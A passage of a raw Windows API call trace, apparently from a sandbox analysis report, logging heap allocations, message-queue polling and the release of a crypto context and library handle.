Flags=0x0, Size=0x10) returned 0x2e50758 [0203.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0203.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0203.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0203.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0203.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0203.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0203.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0203.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0203.833] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0203.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0203.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0203.833] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0203.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0203.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0203.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0203.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0203.833] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0203.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0203.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0203.833] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0203.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0203.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0203.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0203.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0203.833] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0203.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0203.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0203.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0203.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0203.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0203.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0203.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0203.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0203.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0203.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0203.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0203.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0203.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0203.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0203.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0203.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0203.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0203.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0203.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0203.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0203.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0203.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0203.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0203.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0203.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0203.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0203.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0203.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0203.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0203.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0203.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0203.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0203.835] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0203.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0203.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0203.835] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0203.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0203.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0203.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0203.835] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0203.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0203.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0203.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0203.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0203.835] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0203.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0203.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0203.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0203.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0203.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0203.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0203.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0203.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0203.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0203.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0203.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0203.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0203.882] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0203.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0203.882] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0203.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0203.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0203.882] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0203.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0203.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0203.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0203.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0203.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0203.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0203.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0203.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0203.883] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0203.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0203.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0203.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0203.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0203.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0203.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0203.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0203.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0203.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0203.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0203.883] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0203.883] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0203.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0203.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0203.884] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0203.884] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0203.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0203.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0203.884] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0203.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0203.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0203.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0203.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0203.884] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0203.884] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0203.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0203.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0203.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0203.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0203.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0203.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0203.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0203.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0203.884] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0203.884] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0203.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0203.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0203.884] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0203.885] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0203.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0203.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0203.893] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0203.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0203.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0203.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0203.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0203.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0203.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0203.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69c28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0203.894] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0203.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0203.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0203.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0203.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0203.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0203.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0203.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0203.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0203.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0203.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0203.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0203.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0203.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0203.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0203.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0203.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0203.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0203.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0203.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0203.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0203.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0203.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0203.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0203.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0203.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0203.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0203.896] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0203.896] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0203.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0203.897] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0203.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0203.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0203.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0203.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0203.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0203.897] FreeLibrary (hLibModule=0x756e0000) returned 1 [0203.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0203.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0203.897] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0203.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0203.897] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0203.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0203.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0203.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0203.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0203.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0203.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0203.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0203.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0203.897] CloseHandle (hObject=0x2d0) returned 1 [0203.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0203.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0203.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0203.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) 